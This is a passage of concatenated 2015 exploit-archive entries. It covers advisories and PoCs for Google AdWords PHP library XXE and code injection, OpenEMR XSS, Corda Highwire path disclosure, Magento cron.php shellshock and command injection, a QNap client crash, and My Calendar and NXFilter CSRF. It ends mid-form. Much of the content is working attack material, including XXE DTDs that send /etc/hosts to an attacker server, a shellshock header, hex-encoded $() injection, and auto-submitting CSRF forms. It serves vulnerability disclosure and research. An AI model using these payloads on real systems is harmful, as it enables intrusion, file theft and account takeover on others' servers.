WSDL document.
---[ testAPI.php ]---
<?php
// Test application reading WSDL from Google AdWords
set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';
$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
.'CampaignService?wsdl';
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null,
null, "CampaignService", "v201502", "Ads_Google",
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);
?>
---------------------
To exploit this application, an attacker needs to perform a MitM attack to
impersonate adwords.google.com server, as mentioned in the introduction.
For simplicity, we can add the following entry to /etc/hosts on the victim's
server:
192.168.57.12 adwords.google.com
to simulate a successful MitM attack where attacker successfully manages
to ,for example, poison the DNS cache to point the adwords subdomain at his
malicious web server (192.168.57.12).
The attacker then needs to create a malicious XML file on his server to
return it to the victim. Example payload could look as follows:
$ curl --insecure 'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl'
<?xml version="1.0"?>
<!DOCTYPE root
[
<!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd">
]>
<test><testing>&xxetest;</testing></test>
The XML payload returned by the attacker will cause the vulnerable
AdWords API library to resolve the 'xxetest' entity and connect
back to the attacker's server to retrieve adwords_xxe_hack.dtd.
This can be verified on the victim's server by executing the demonstrated
testAPI.php script:
$ curl http://victims_server/googleads-php-lib-master/testAPI.php
The script will try to retrieve the WSDL/XML document from adwords.google.com
which will provide the above malicious XML.
After the injected entity is read, the attacker will get a connection from the
victim:
attacker@mitm# nc -vv -l 8080
Connection from victims_server port 8080 [tcp/http-alt] accepted
GET /adwords_xxe_hack.dtd HTTP/1.0
Host: 192.168.57.12:8080
At this point attacker could add other entities to carry out an Out of band
XXE attack to read system files (such as /etc/passwd) located on the victim's
server, or execute commands via expect:// PHP wrapper if the 'expect' module
is enabled.
For example, this payload:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd">
%dtd;
]>
<test><testing>test &send;</testing></test>
with another file located on the attacker's file server:
---[ send.dtd ]---
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.57.12:8080/retrieved/%file;'>">
%all;
------------------
would send the contents of the /etc/hosts file to the attacker.
VI. BUSINESS IMPACT
-------------------------
The severity of this issue is lowered to medium/high despite as the XXE
injection vulnerability in the code, the attacker must impersonate
adwords.google.com server to be able to inject malicious XML.
If there is a possibility for such an attack, the severity of the issue can
grow to high/critical due to the exploitation possibilities through XXE
injection.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of Google AdWords API PHP client library was confirmed to
be vulnerable. The client libraries for other platforms seem to lack necessary
XXE attack preventions too.
For example, the Java version, did not set the
'sax/features/external-general-entities' setting to off when creating an
instance of the DocumentBuilderFactory class. And the .NET version of the
AdWords API was missing explicit 'ProhibitDtd' setting on the XMLReader.
Vulnerabilities were found in googleads-php-lib in versions below 5.9.0 and
reported to Google in May 2015, they were just fixed in AdWords php library ver.
6.3.0.
VIII. SOLUTION
-------------------------
Install the latest version of the Google AdWords API library available for your
platform, and tighten SSL settings by enabling SSL CA verification in the
library settings file.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt
https://developers.google.com/adwords/api/docs/clientlibraries
https://github.com/googleads/googleads-php-lib
https://developers.google.com/adwords/api/docs/
PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php
http://legalhackers.com
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. TIMELINE
-------------------------
May 18th, 2015: Advisory created and sent to Google Security Team
Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched
Nov 6th, 2015: Advisory released publicly
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
source: https://www.securityfocus.com/bid/61154/info
OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
OpenEMR 4.1.1 patch-12 and prior are vulnerable.
1. Misc > Office Notes ('note' parameter is vulnerable with a POST to
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)
#Request:
POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
mode=new&offset=0&active=all¬e=<script>alert(document.cookie)</script>
#Response:
<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115'
onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label
for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label
for='box115' class='text'><script>alert(document.cookie)</script> </label></td></tr>
<snip>
source: https://www.securityfocus.com/bid/61152/info
Corda Highwire is prone to a path disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
http://www.example.com/highwire.ashx?url=../../
# Exploit Title: eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: http://magento.com
# Version: eBay Magento CE <= 1.9.2.1 / Magento EE <=1.14.2.1
# Tested on: Linux
# Magento reference ID: APPSEC-1045
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium
- eBay Magento ref.: APPSEC-1037
=============================================
I. VULNERABILITY
-------------------------
eBay Magento CE <= 1.9.2.1 Unrestricted Cron Script (Potential Code Execution / DoS)
eBay Magento EE <= 1.14.2.1
II. BACKGROUND
-------------------------
- eBay Magento eCommerce
http://magento.com/
"More than 240,000 merchants worldwide put their trust in our eCommerce
software. Magento's eCommerce platform gives you the tools you need to attract
more prospects, sell more products, and make more money. It's what we do.
We're owned by eBay, so you know we're eCommerce experts"
III. INTRODUCTION
-------------------------
Default installation of ebay Magento eCommerce software comes with a cron.php
which allows to manage scheduled tasks. The script is not protected by default
and can be publicly accessed.
The publicly exposed cron script poses some potential risks such as exploitation
of the well known shellshock vulnerability on unpatched systems leading to code
execution.
The same script has another potential command execution vector that stems from
inproper data sanitisation passed to a shell_exec function.
Apart from the code execution vectors, the script could potentially be used to
perform a DoS attack due to lack of locking mechanism that prevents the script
from spawning multiple instances of other helper shell scripts.
IV. DESCRIPTION
-------------------------
A) Shellshock vector
Magento cron.php script includes a command execution function that looks as
follows:
-----[ magento/cron.php ]-----
...
try {
if (stripos(PHP_OS, 'win') === false) {
$options = getopt('m::');
if (isset($options['m'])) {
if ($options['m'] == 'always') {
$cronMode = 'always';
} elseif ($options['m'] == 'default') {
$cronMode = 'default';
} else {
Mage::throwException('Unrecognized cron mode was defined');
}
} else if (!$isShellDisabled) {
$fileName = basename(__FILE__);
$baseDir = dirname(__FILE__);
shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
shell_exec("/bin/sh $baseDir/cron.sh $fileName -malways 1 > /dev/null 2>&1 &");
exit;
}
...
------------------------------
As can be seen, the script runs shell_exec() that loads /bin/sh program which
is usually a symlink to /bin/bash.
Although the shellshock vulnerability should be patched, there have been reports
of linux distributions that insufficiently patched the issue and remained
vulnerable.
Magento's cron.php could be used as exploit the shellshock vulnerability on
unpatched systems which host Magento in CGI mode (which can be easily enabled
via .htaccess file provided with Magento).
B) Command injection
The script fails to sanitise the input data coming from $baseDir variable.
Input passed to shell execution functions should always be sanitised with
escapeshellcmd / escapeshellarg PHP functions.
Although not exploitable on its own, the lack of escaping could allow to inject
some system commands on Magento hosting platforms which have a feature to
create backups of directories with a specified name within the document root.
If the provided hosting control panel allows to specify names of such backups,
a user could potentially inject some malicious data within the directory name
which could result in a command injection when cron.php is run from the backup
directory.
The command would execute upon the shell_exec() receiving the malicious data
injected with the help of the $baseDir variable.
C) Denial of Service
As the script lacks any access control and a locking mechanism, it is possible
to remotely request cron.php multiple times in order to make it spawn
multiple instances of the cron.sh script.
As a single execution of the script results in 2 cron.sh spawned processes, plus
a separate CGI process (if website runs as CGI), an attacker could potentially
overload the Magento site with multiple requests and create a Denial of Service
condition by process exhaustion etc.
V. PROOF OF CONCEPT
-------------------------
A) Shellshock vector exploit
Sending the following request to a CGI-enabled Magento site:
GET /magento/cron.php HTTP/1.1
Host: victim_magento_site
User-Agent: () { :; } ; /bin/touch /tmp/magento_cron_hack
will result in a command execution on shellshock affected systems.
The resul of the above would be:
victim$ ls -l /tmp/magento_cron_hack
-rw-rw-rw- 1 www-data www-data 0 Jul 26 09:08 /tmp/magento_cron_hack
B) Command injection
Due to lack of sanitisation, if a malicious Magento user had access
to a backup facility, he could potenially create a backup of the magento
directory with a command within the name , e.g.:
$(id)
The user could then request the cron.php script via the following request:
GET /magento/$(id)/cron.php HTTP/1.1
Host: victim_magento_site
Because of the shell_exec() function in the quoted sourcecode of cron.php:
---
$baseDir = dirname(__FILE__);
shell_exec("/bin/sh $baseDir/cron.sh $fileName -mdefault 1 > /dev/null 2>&1 &");
---
it would cause the cron.php script to run the following command:
/bin/sh /var/www/magento/$(id)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
The command would run id program as soon as bash command expansion syntax of
$() got evaluated.
An attacker could also run more complex commands, by hex encoding disallowed
characters within directory names (such as '/' directory separator).
For example, he could run the command:
touch /tmp/magento_exec
by encoding it as follows:
echo 'touch /tmp/magento_exec' | hexdump -v -e '"\\\\\\""x" 1/1 "%02x" ""' ${1}
\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63
He could then execute it via a GET request of:
GET /magento/$(`echo%20-e%20\\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/exec.php HTTP/1.1
which would execute:
/bin/sh /var/www/magento/exec_poc/$(`echo -e \\\x74\\\x6f\\\x75\\\x63\\\x68\\\x20\\\x2f\\\x74\\\x6d\\\x70\\\x2f\\\x6d\\\x61\\\x67\\\x65\\\x6e\\\x74\\\x6f\\\x5f\\\x65\\\x78\\\x65\\\x63`)/cron.sh exec.php -mdefault 1 > /dev/null 2>&1 &
resulting in creating the PoC file:
victim$ ls -l /tmp/magento_exec
-rw-r--r-- 1 www-data www-data 0 Jul 26 11:20 /tmp/magento_exec
C) Denial of Service
By sending multiple requests to cron.php, for example using apache benchmark
tool:
attacker$ ab -n 500 -c 30 http://victim_magento_site/magento/cron.php
attacker could exploit the lack of locking to spawn numerous processes,
potentially leading to resource exhaustion and a DoS condition.
The above command would result in creating multiple instances of the
cron.php/cron.sh scripts on the target host:
...
www-data 5529 0.2 1.3 287756 6872 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5531 0.2 1.1 288000 5848 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -mdefault
www-data 5533 0.2 1.2 288000 6432 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5535 0.3 1.2 288000 6484 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5537 0.3 1.5 288768 7740 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5539 0.3 1.3 287524 6956 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5541 0.3 1.4 288768 7168 ? Dl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5543 0.3 1.4 288288 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5546 0.3 1.4 288512 7188 ? Rl 10:02 0:00 /usr/bin/php /var/www/magento/cron.php -malways
www-data 5885 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5886 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5887 0.0 0.0 17880 456 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5888 0.0 0.0 17880 440 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5889 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5890 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5891 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5899 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5900 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5901 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5904 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5907 0.0 0.0 17880 496 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5909 0.0 0.0 17880 500 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5910 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -malways 1
www-data 5912 0.0 0.0 17880 464 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
www-data 5913 0.0 0.0 17880 460 ? S 10:03 0:00 /bin/sh /var/www/magento/cron.sh cron.php -mdefault 1
...
VI. BUSINESS IMPACT
-------------------------
The issue has been rated as medium. Depending on the Magento hosting features
and applied patches code execution could be possible which would increase the
risks.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of eBay Magento CE (1.9.2.1) was confirmed to contain
the vulnerable cron.php script.
The Magento EE versions also contain this problem according to the vendor's
advisory.
VIII. SOLUTION
-------------------------
eBay Magento assigned this issue the ID of APPSEC-1037 and supplied a patch
for it within the SUPEE-6788 patch bundle available on the official website.
The patch adds sanitisation functions around the shell_exec() code however
the cron script remains publicly accessible.
It is recommended to protect the cron script by other means.
For example, the script could require a key supplied together with a GET
request to proceed with the execution which is commonly used with other
major open source solutions.
The easiest way would also be restricting acess to the script to only
certain IPs or localhost within the web server configuration.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Magento-Unrestricted-Cron-Script-Vulnerability.txt
Oficial eBay Magento website:
http://magento.com/
Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML
Functionality Using Multibyte Payloads' (APPSEC-1037) is available at:
https://magento.com/security/patches/supee-6788
X. CREDITS
-------------------------
The vulnerabilities have been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
Nov 6th, 2015: Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : QNap QVR Client 5.1.0.11290 Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 05/11/2015
# Vendor Homepage: http://www.qnapsecurity.com/n/en/
# Software Link : http://download.qnap.com/Surveillance/Utility/QMon_20150630.zip
# Tested Version : 5.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python qvr_client_5.1.py
# 2.- Open qvr_client_5.1.txt and copy content to clipboard
# 3.- Open QVR Client
# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80
# 5.- Paste ClipBoard on "Nombre de Usuario"
# 6.- Contraseña -> test
# 7.- Aceptar
# 8.- Crashed
buffer = "\x41" * 260
f = open ("qvr_client_5.1.txt", "w")
f.write(buffer)
f.close()
# Date: 06.11.2015
# Title: Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: <=6.2.0
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution
(googleads-php-lib)
II. BACKGROUND
-------------------------
- AdWords API
https://developers.google.com/adwords/api/docs/
"The AdWords API is a collection of web services that you can use to build
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are
provided to help you develop applications more quickly."
AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc.
These can be found at:
https://developers.google.com/adwords/api/docs/clientlibraries
III. INTRODUCTION
-------------------------
The Google AdWords API client library for PHP contains a WSDL Interpreter
class which is described in a comment within the source code as:
"
* The main class for handling WSDL interpretation.
*
* The WSDLInterpreter is utilized for the parsing of a WSDL document for rapid
* and flexible use within the context of PHP 5 scripts.
"
The class contains a function savePHP() which allows to convert the WSDL
document received from a remote end into a PHP file.
The funcion is vulnerable to Path Traversal and Code Execution vulnerabilities.
IV. DESCRIPTION
-------------------------
googleads-php-lib contains the following function which is meant to load WSDL
document (XML data) from a remote Google AdWords server:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
protected function loadWsdl($wsdlUri, $proxy = null) {
// Set proxy.
if ($proxy) {
$opts = array(
'http' => array(
'proxy' => $proxy,
'request_fulluri' => true
)
);
$context = stream_context_get_default($opts);
libxml_set_streams_context($context);
}
$this->dom = new DOMDocument();
$this->dom->load($wsdlUri,
LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);
-------------------------------------------------------
For security reasons Google AdWords API should only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the
https:// stream context.
It fails to assign Certificate Authority (CA), turn the verify_peer
option to ON, specify allowed ciphers etc.
It uses the stream_context_get_default() function to get the default context,
which on all PHP versions below PHP 5.6.x (see references), does not validate
the CA by default.
Because of this, application may retrieve data from untrusted sources
pretending to be adwords.google.com.
Further on, the WSDLInterpreter class contains the following savePHP function:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
/**
* Saves the PHP source code that has been loaded to a target directory.
*
* Services will be saved by their validated name, and classes will be
* included with each service file so that they can be utilized independently.
*
* @param string $outputDirectory the destination directory for the source
* code
* @return array array of source code files that were written out
* @throws WSDLInterpreterException problem in writing out service sources
*/
public function savePHP($outputDirectory) {
if (!count($this->servicePHPSources)) {
throw new WSDLInterpreterException("No services loaded");
}
$namespace = $this->enableNamespaces ? sprintf("namespace %s;\n\n",
$this->utils->getNamespace()) : '';
$require = sprintf("require_once \"%s\";\n\n", $this->soapClientClassPath);
$classSource = join("\n\n", $this->classPHPSources);
$outputFiles =
foreach ($this->servicePHPSources as $serviceName => $serviceCode) {
$filename = sprintf('%s/%s.php', $outputDirectory, $serviceName);
$success = file_put_contents($filename, sprintf(
"<?php\n%s%s%s%s\n\n%s\n\n", $this->getFileHeader(), $namespace,
$require, $classSource, $serviceCode));
...
-------------------------------------------------------
The function does not perform sufficient sanitisation of the WSDL document
received from a remote end. It allows to inject '../' sequence, which can be
used by attackers to save the resulting translated PHP file into an arbitrary
directory on the system.
It also fails to validate the Name spaces provided within WSDL XML document,
making it possible to inject arbitrary PHP code via encoding it in hex.
For the attack to be successful, the attacker needs to perform a MitM attack
to impersonate adwords.google.com server (eg. via DNS poisoning/spoofing/proxy
attacks, ARP spoofing, etc. ) to inject malicious XML code.
V. PROOF OF CONCEPT
-------------------------
Below is a test application that makes use of of PHP Google AdWords API library.
The application simply connects to the AdWords API endpoint to retrieve the
Google API WSDL document and translates it into a PHP file.
---[ testAPI.php ]---
<?php
// Test application reading WSDL from Google AdWords
set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';
$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
.'CampaignService?wsdl';
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null,
null, "CampaignService", "v201502", "Ads_Google",
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);
$wsdlInterpreter->savePHP('/tmp/');
?>
---------------------
To exploit this application, an attacker needs to perform a MitM attack
to impersonate adwords.google.com server as mentioned in the description above.
If an attacker manages to inject the XML below, when the victim requests
the https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl link
from Google AdWords endpoint:
---[ malicious XML ]---
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns:typens="urn:POC_RCE"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/"
name="POCexploit" targetNamespace="urn:POCexploit444"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; } const NOTHING = "">
<service name="../../../var/www/html/POC_Exploit">
<port name="Some_HandlerPort" binding="typens:Some_HandlerBinding">
<soap:address location="https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl" />
</port>
</service>
</definitions>
----------------------
the vulnerable application will translate it and save it as a script in
/var/www/html/POC_Exploit.php (assuming directory is writable) location,
instead of /tmp location, due the Path Traversal in '<service name=' tag.
It will also decode the hex values representing a malicious PHP script to:
"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; }
const NOTHING = "
The resulting file will be saved in /var/www/html/POC_Exploit.php , and will
look as follows after the WSDL to PHP translation:
---[ resulting POC_Exploit.php file ]---
<?php
/**
[cut]
* @package Ads_Google
* @subpackage v201309
* @category WebServices
* @copyright 2014, Google Inc. All Rights Reserved.
* @license http://www.apache.org/licenses/LICENSE-2.0 Apache License,
* Version 2.0
*/
namespace Ads_Google;
require_once "../../src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php";
if (!class_exists("VarwwwhtmlPOC_Exploit", false)) {
/**
* VarwwwhtmlPOC_Exploit
* @package Ads_Google
* @subpackage v201309
*/
class VarwwwhtmlPOC_Exploit extends AdWordsSoapClient {
const SERVICE_NAME = "../../../var/www/html/POC_Exploit";
const WSDL_NAMESPACE = "urn:POCexploit444"; public function __destruct() { $exfoo = `/bin/touch /tmp/adwords_api_hacked`; } const NOTHING = "";
const ENDPOINT = "https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl";
/**
* The endpoint of the service
* @var string
*/
public static $endpoint = "https://adwords.google.com/api/adwords/cm/v201502/CampaignService?wsdl";
/**
* Constructor using wsdl location and options array
* @param string $wsdl WSDL location for this service
* @param array $options Options for the SoapClient
*/
public function __construct($wsdl, $options, $user) {
$options["classmap"] = self::$classmap;
parent::__construct($wsdl, $options, $user, self::SERVICE_NAME,
self::WSDL_NAMESPACE);
}
}
}
----------------------------------------
If such class gets included it will execute the malicious code due to the
injected __destruct() method, which creates /tmp/adwrods_api_hacked file.
At this point the attacker can control the name of the class (through service name),
the path to the resulting PHP file, and is also able to inject any PHP code.
Going further, He could also close the class definition statement and write an arbitrary
PHP code in the main file.
This would allow the attacker to create a stand alone script which he
could request remotely via the Web server if he managed save it within the web
root.
In this way the attacker could create a stand alone PHP command shell and get
access to the system.
VI. BUSINESS IMPACT
-------------------------
The severity of this issue is lowered to medium/high as despite the possibility
to execute arbitrary code, the attacker must impersonate adwords.google.com
server to be able to inject malicious XML.
If there is a possibility for such an attack, the severity of the issue
can grow to high/critical.
VII. SYSTEMS AFFECTED
-------------------------
Google AdWords API PHP client library in versions up to 6.2.0 contain the
vulnerable WSDLInterpreter code.
VIII. SOLUTION
-------------------------
Upgrade Google AdWords API PHP client library to the latest version.
IX. REFERENCES
-------------------------
This advisory:
http://legalhackers.com/advisories/Google-AdWords-PHP-Client-library-PHP-Code-Execution.txt
Related, Google AdWords API client libraries - XML eXternal Entity Injection (XXE) vuln:
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt
https://github.com/googleads/googleads-php-lib
https://github.com/googleads/googleads-php-lib/blob/master/ChangeLog.md
https://developers.google.com/adwords/api/docs/
https://developers.google.com/adwords/api/docs/clientlibraries
PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
May 18th, 2015: Advisory created and sent to Google Security Team
Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched
Nov 6th, 2015: Advisory released publicly
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
Exploit TItle: My Calendar 2.4.10 CSRF and XSS
Exploit Author : Mysticism (Ahn Sung Jun)
Date : 2015-11-06
Vendor Homepage : http://wordpress.org/plugins/my-calendar
Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip
Version : 2.4.10
Tested On : kail linux Iceweasel
===================
Vulnerable Code : my-calendar-categoris.php
if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) {
$term = wp_insert_term( $_POST['category_name'], 'mc-event-category' );
if ( ! is_wp_error( $term ) ) {
$term = $term['term_id'];
} else {
$term = false;
}
$add = array(
'category_name' => $_POST['category_name'],
'category_color' => $_POST['category_color'],
'category_icon' => $_POST['category_icon'],
'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ),
'category_term' => $term
);
}
POC (CSRF & XSS)
<html>
<body onload="javascript:document.forms[0].submit()">
<form id="my-calendar" method="post" action="http://192.168.0.2/wordpress/wp-admin/admin.php?page=my-calendar-categories">
<input type="hidden" name="_wpnonce" value="35ed9ab206"/>
<input type="hidden" name="mode" value="add"/>
<input type="hidden" name="category_id" value="4"/>
<input name="category_name" id="cat_name" type="hidden" class="input" size="30" value="<script>alert(document.cookie)</script>">
<input type="hidden" id="cat_color" name="category_color" class="mc-color-input" size="10" maxlength="7" value=""/>
<input type="hidden" value="on" name="category_private" id="cat_private" />
<input type="hidden" value="on" name="mc_default_category" id="mc_default_category" />
<input type="hidden" value="on" name="mc_skip_holidays_category" id="mc_shc" />
<input type="submit" name="save" class="button-primary" value="Add Category »"/>
</form>
</html>
Discovered By
Mysticism(Ahn Sung Jun)
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt
Vendor:
================================
www.nxfilter.org/p2/
Product:
================================
NXFilter v3.0.3
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protections exist allowing us to make malicious HTTP requests on
behalf of our victim.
The Server will then happily process any of the following actions if our
victim clicks our infected linx
or visits our malicious website while currently logged in to the vulnerable
application.
1) "add arbitrary users"
2) "add or change SMTP settings"
3) "add arbitrary redirect domains"
4) "add arbitrary zone transfers"
5) "delete zone transfer domains"
Exploit code(s):
===============
<!DOCTYPE>
<html>
<head>
<title></title>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) CSRF add arbitrary users
<form id="HELL" action="http://localhost/user,user.jsp" method="post">
<input type="text" name="action_flag" value="insert" >
<input type="text" name="name" value="punksnotdead">
<input type="text" name="description" value="<script>alert(666)</script>">
<---- and some persistent XSS!
</form>
2) CSRF add or change SMTP notification alerts
<form id="HELL" action="http://localhost/config,alert.jsp" method="post">
<input type="text" name="action_flag" value="update" >
<input type="text" name="admin_email" value="ghostofsin@abyss.com">
<input type="text" name="smtp_host" value="6.6.6.0">
<input type="text" name="smtp_port" value="25">
<input type="text" name="smtp_user" value="hyp3rlinx">
<input type="text" name="smtp_passwd" value="abc123">
<input type="text" name="period" value="0">
<input type="text" name="token" value="">
</form>
3) CSRF add arbitrary redirect domain
<form id="HELL" action="http://localhost/config,redirection.jsp"
method="post">
<input type="text" name="action_flag" value="insert" >
<input type="text" name="src" value="hyp3rlinx.altervista.org">
<input type="text" name="dst" value="6.6.6.0">
</form>
4) CSRF add arbitrary zone transfers
<form id="HELL" action="http://localhost/config,zone_transfer.jsp"
method="post">
<input type="text" name="action_flag" value="insert" >
